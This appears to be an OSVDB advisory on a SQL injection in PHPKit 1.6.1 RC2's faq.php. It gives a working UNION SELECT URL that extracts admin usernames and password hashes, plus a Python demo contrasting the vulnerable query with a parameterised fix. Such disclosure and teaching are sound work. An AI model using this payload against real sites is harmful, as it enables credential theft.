PHPKit faq.php catid Variable SQL Injection

2006-11-10T18:45:22
ID OSVDB:31265
Type osvdb
Reporter OSVDB
Modified 2006-11-10T18:45:22

Description

PHPKit contains a flaw that may allow a remote SQL injection attack. The faq.php script, reached through include.php with path=faq/faq.php, does not properly sanitize the catid variable before using it in an SQL query. A remote attacker can supply a crafted catid value containing a UNION SELECT to read arbitrary data from the database, such as the user_name and user_pw columns of the phpkit_user table. The referenced advisory reports the issue against PHPKit 1.6.1 RC2.

Manual Testing Notes

Requesting the following URL against a vulnerable installation is intended to return the user_name and user_pw of the user with user_id 1 from the phpkit_user table in place of FAQ content:

/include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1

Decoded, the catid value is:

-1' UNION SELECT 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13 FROM phpkit_user where  user_id=1 and '1'='1

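The mechanics of the testing note above, as an added example that is neither PHPKit's code nor part of the original advisory. It reconstructs in Python with SQLite the query shape the payload implies (the catid value spliced into a quoted literal of a 13-column SELECT, since the UNION supplies 13 values) and contrasts it with a parameterised query that treats the same value as data. The table layouts, every column name other than user_name and user_pw, and the sample rows are assumptions constructed for this demonstration.

```python
import sqlite3
import urllib.parse

# Payload copied from the advisory's manual testing note (still URL-encoded).
ENCODED_CATID = ("-1'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13"
                 "%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20'1'='1")
# What the web server hands to the script after decoding the query string.
CATID_PAYLOAD = urllib.parse.unquote(ENCODED_CATID)


def make_db():
    """Constructed in-memory sample database.

    Assumption: the FAQ query selects 13 columns (the payload's UNION supplies
    13 values) and phpkit_user carries user_name/user_pw. Column names other
    than those named in the payload are invented for this example.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE phpkit_faq ("
        "faq_id INTEGER, catid INTEGER, title TEXT, question TEXT, answer TEXT,"
        " keywords TEXT, sort INTEGER, hits INTEGER, created INTEGER,"
        " updated INTEGER, author TEXT, status INTEGER, lang TEXT)"
    )
    conn.execute(
        "INSERT INTO phpkit_faq VALUES "
        "(1, 1, 'Login', 'How do I log in?', 'Use the login form.', '',"
        " 1, 0, 0, 0, 'admin', 1, 'de')"
    )
    conn.execute(
        "CREATE TABLE phpkit_user (user_id INTEGER, user_name TEXT, user_pw TEXT)"
    )
    # Constructed credential row; the hash is md5('password'), not a real secret.
    conn.execute(
        "INSERT INTO phpkit_user VALUES "
        "(1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99')"
    )
    return conn


def vulnerable_sql(catid):
    """Query shape implied by the advisory: catid pasted into a quoted literal."""
    return f"SELECT * FROM phpkit_faq WHERE catid='{catid}'"


def faq_vulnerable(conn, catid):
    """Runs the unsanitised query; the payload's UNION appends user rows."""
    return conn.execute(vulnerable_sql(catid)).fetchall()


def faq_fixed(conn, catid):
    """Parameterised version: catid is bound as data and never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM phpkit_faq WHERE catid = ?", (catid,)
    ).fetchall()


def leaked_credentials(rows):
    """Positions 5 and 6 of each row are where the payload places user_name and
    user_pw; on a live site the attacker reads them off the rendered FAQ page."""
    return [(r[4], r[5]) for r in rows]


if __name__ == "__main__":
    db = make_db()
    print("executed:", vulnerable_sql(CATID_PAYLOAD))
    print("vulnerable:", leaked_credentials(faq_vulnerable(db, CATID_PAYLOAD)))
    print("fixed:", faq_fixed(db, CATID_PAYLOAD))
```

The leading -1 makes the left side of the UNION match nothing, so the only row rendered is the one built from phpkit_user; the trailing '1'='1 closes the quote the application appends. With the bound parameter the same string is compared against the integer catid column as a whole and matches no row.
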
References:

Vendor URL: http://www.phpkit.de/
Secunia Advisory ID: 17479
Other Advisory URL: http://www.bb-pcsecurity.de/websecurity/532/org/PHPKit_1.6.1_RC2_(faq-faq.php)_Remote_SQL_Injection_Exploit.htm
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0167.html
ISS X-Force ID: 30209
CVE ID: CVE-2006-7115
Bugtraq ID: 21002